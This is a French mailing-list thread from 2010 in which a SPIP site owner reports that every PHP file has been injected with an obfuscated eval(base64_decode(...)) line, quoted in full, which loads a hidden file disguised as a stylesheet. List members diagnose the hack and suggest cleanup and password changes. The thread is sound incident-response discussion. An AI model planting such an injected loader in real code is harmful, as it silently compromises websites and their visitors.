Bonjour à tous,
Sur un site en SPIP 1.9.2i dont j'avais dû vider le cache plusieurs fois ces temps derniers en raison de comportements inhabituels,
je viens de découvrir que tous les fichiers php, sans exception, sont systématiquement complétés en début de fichier par ce même code :
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzM3L2QyMzE3NjA4OTEvaHRkb2NzL3NobmQvZWNyaXJlL3NhZmVodG1sL2NsYXNzZXMvSFRNTFNheDMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?
A+
JPH
Le 15/02/10 22:16, JPH a écrit :
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?
sans aucun doute oui.
donc : réinstaller des fichiers sains, changer les pass ftp, mysql et spip, noter date et heure des modif apportées sur les fichiers standards de spip, étudier les fichiers .log de tmp/ ...
Le 15/02/2010 22:33, denisb a écrit :
Le 15/02/10 22:16, JPH a écrit :
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?sans aucun doute oui.
donc : réinstaller des fichiers sains, changer les pass ftp, mysql et
spip, noter date et heure des modif apportées sur les fichiers standards
de spip, étudier les fichiers .log de tmp/ ...
oui, oui, pfft, j'ai évalué la chaîne, c'est bien ça !
Injection de code dans tous les fichiers php.
Et Z...
Merci pour ta réponse - j'interviens.
A+
Alain
Le 15/02/10 22:44, JPH a écrit :
Injection de code dans tous les fichiers php.
pour que *tous* les fichiers .php aient été impactés, un script (robot) a eu accès en écriture à ton DocumentRoot
les fichiers du répertoire config/ (protégé normalement par htaccess) ont-ils aussi été touchés ?
JPH a écrit :
Le 15/02/2010 22:33, denisb a écrit :
Le 15/02/10 22:16, JPH a écrit :
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?sans aucun doute oui.
donc : réinstaller des fichiers sains, changer les pass ftp, mysql et
spip, noter date et heure des modif apportées sur les fichiers standards
de spip, étudier les fichiers .log de tmp/ ...oui, oui, pfft, j'ai évalué la chaîne, c'est bien ça !
Injection de code dans tous les fichiers php.
Et Z...
Merci pour ta réponse - j'interviens.
A+
Alain_______________________________________________
Peux tu nous dire sur quel genre d'hébergement tu es? mutu ou pas?
Quel est ton hébergeur?
Et les droits des fichiers corrompus?
Bernard
Le 15/02/2010 23:01, Bernard Blazin a écrit :
JPH a écrit :
Le 15/02/2010 22:33, denisb a écrit :
Le 15/02/10 22:16, JPH a écrit :
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?sans aucun doute oui.
donc : réinstaller des fichiers sains, changer les pass ftp, mysql et
spip, noter date et heure des modif apportées sur les fichiers standards
de spip, étudier les fichiers .log de tmp/ ...oui, oui, pfft, j'ai évalué la chaîne, c'est bien ça !
Injection de code dans tous les fichiers php.
Et Z...
Merci pour ta réponse - j'interviens.
A+
Alain_______________________________________________
Peux tu nous dire sur quel genre d'hébergement tu es? mutu ou pas?
Quel est ton hébergeur?
Et les droits des fichiers corrompus?Bernard
oui, mutualisé chez 1&1
pour les droits, rien ne semble avoir été modifié
par ex : connect.php : 666 ; mes_options.php : 644
etc.
Il reste donc une belle faille.
Je viens de constater la même chose sur un autre site, même hébergeur
tous les fichiers .php sont également injectés.
le site est en SPIP 1.9.2h
Le 15/02/2010 22:57, denisb a écrit :
Le 15/02/10 22:44, JPH a écrit :
Injection de code dans tous les fichiers php.
pour que *tous* les fichiers .php aient été impactés, un script (robot)
a eu accès en écriture à ton DocumentRoot
exact !
les fichiers du répertoire config/ (protégé normalement par htaccess)
ont-ils aussi été touchés ?
oui, injectés du même code et bien protégés par htaccess.
Le 15/02/2010 22:57, denisb a écrit :
Le 15/02/10 22:44, JPH a écrit :
Injection de code dans tous les fichiers php.
pour que *tous* les fichiers .php aient été impactés, un script (robot)
a eu accès en écriture à ton DocumentRoot
Question : donc le document root étant maintenant connu par le robot
faut-il en changer ? Etant mutualisé, l'hébergeur doit pourvoir le faire ?
ou alors les modifications des codes sur les bases et connexions suffisent sans modifier le code du document root ?
Merci pour ta réponse
A+
JPH
Le 15/02/10 23:43, JPH a écrit :
Question : donc le document root étant maintenant connu par le robot
faut-il en changer ?
non.
ou alors les modifications des codes sur les bases et connexions
suffisent sans modifier le code du document root ?
si l'attaque est la conséquence d'un vol de pass ftp (plus souvent
qu'on ne croit), il te faut vérifier *toutes* les machines de *tous*
les admins qui ont un accès ftp à l'hébergement.
un malware installé sur une machine peut en effet récupérer le pass
utilisé lors d'une connexion ftp.
donc : désinfecter la (les) machine avant de modifier login et pass ftp
sur l'hébergement.
Le 15/02/2010 23:34, JPH a écrit :
Le 15/02/2010 23:01, Bernard Blazin a écrit :
JPH a écrit :
Le 15/02/2010 22:33, denisb a écrit :
Le 15/02/10 22:16, JPH a écrit :
Quelqu'un aurait-il une explication ?
Le site serait-il hacké ?sans aucun doute oui.
donc : réinstaller des fichiers sains, changer les pass ftp, mysql et
spip, noter date et heure des modif apportées sur les fichiers standards
de spip, étudier les fichiers .log de tmp/ ...oui, oui, pfft, j'ai évalué la chaîne, c'est bien ça !
Injection de code dans tous les fichiers php.
Et Z...
Merci pour ta réponse - j'interviens.
A+
Alain_______________________________________________
Peux tu nous dire sur quel genre d'hébergement tu es? mutu ou pas?
Quel est ton hébergeur?
Et les droits des fichiers corrompus?Bernard
oui, mutualisé chez 1&1
pour les droits, rien ne semble avoir été modifié
par ex : connect.php : 666 ; mes_options.php : 644
etc.Il reste donc une belle faille.
Je viens de constater la même chose sur un autre site, même hébergeur
tous les fichiers .php sont également injectés.
le site est en SPIP 1.9.2h
Accès FTP,
Avec windows ?
Plusieurs utilisateurs ayant le pass ftp.
Le 2ème site est configuré aussi sur le PC ?
99% de chance que ca soit un virus qui ai pris les pass ftp.
Le vol du ftp... artcht !
Effectivement plusieurs admin on le pass ftp
et il n'est pas exclu que leurs machines ne soient pas infectées.
Je vais leur demander de procéder au grand ménage.
Bonne journée et merci,
A+
JPH
Le 16/02/2010 00:47, denisb a écrit :
Le 15/02/10 23:43, JPH a écrit :
Question : donc le document root étant maintenant connu par le robot
faut-il en changer ?non.
ou alors les modifications des codes sur les bases et connexions
suffisent sans modifier le code du document root ?si l'attaque est la conséquence d'un vol de pass ftp (plus souvent
qu'on ne croit), il te faut vérifier *toutes* les machines de *tous*
les admins qui ont un accès ftp à l'hébergement.un malware installé sur une machine peut en effet récupérer le pass
utilisé lors d'une connexion ftp.
donc : désinfecter la (les) machine avant de modifier login et pass ftp
sur l'hébergement.